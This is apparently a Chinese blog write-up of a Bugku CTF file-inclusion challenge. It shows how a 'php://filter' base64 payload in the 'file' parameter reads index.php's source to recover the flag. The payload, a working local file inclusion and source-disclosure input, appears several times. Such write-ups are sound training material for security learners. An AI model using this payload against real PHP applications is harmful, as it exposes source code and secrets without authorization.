技术栈

bugku--文件包含

過路人!2023-12-15 17:25

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

上一篇:cfa一级考生复习经验分享系列(三)
下一篇:Kubeadm 方式部署K8s集群
相关推荐
Bruce_Liuxiaowei
4 天前
CTF实战秘籍:跨平台文件合并与数据重构技术
重构·ctf
玥轩_521
4 天前
BUUCTF 大流量分析(三) 1
安全·网络安全·wireshark·ctf·misc·buuctf·大流量分析
lally.
5 天前
2025御网杯wp(web,misc,crypto)
前端·ctf
nuc-127
18 天前
[ACTF2020 新生赛]BackupFile题解
web·ctf
摸鱼也很难
19 天前
[GXYCTF2019]Ping Ping Ping
ctf·命令执行
摸鱼也很难
19 天前
[ACTF2020 新生赛]Upload
ctf
菜鸟小白:长岛icetea
20 天前
第十六届蓝桥杯网安初赛wp
蓝桥杯·ctf
ALe要立志成为web糕手
21 天前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
TazmiDev
21 天前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注
uwvwko
22 天前
ctfhow——web入门214~218(时间盲注开始)
前端·数据库·mysql·ctf
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05DeepSeek各版本说明与优缺点分析06Coze扣子平台完整体验和实践(附国内和国际版对比)07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08苍穹外卖面试总结09yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记10深度学习基础--ResNet网络的讲解,ResNet50的复现(pytorch)以及用复现的ResNet50做鸟类图像分类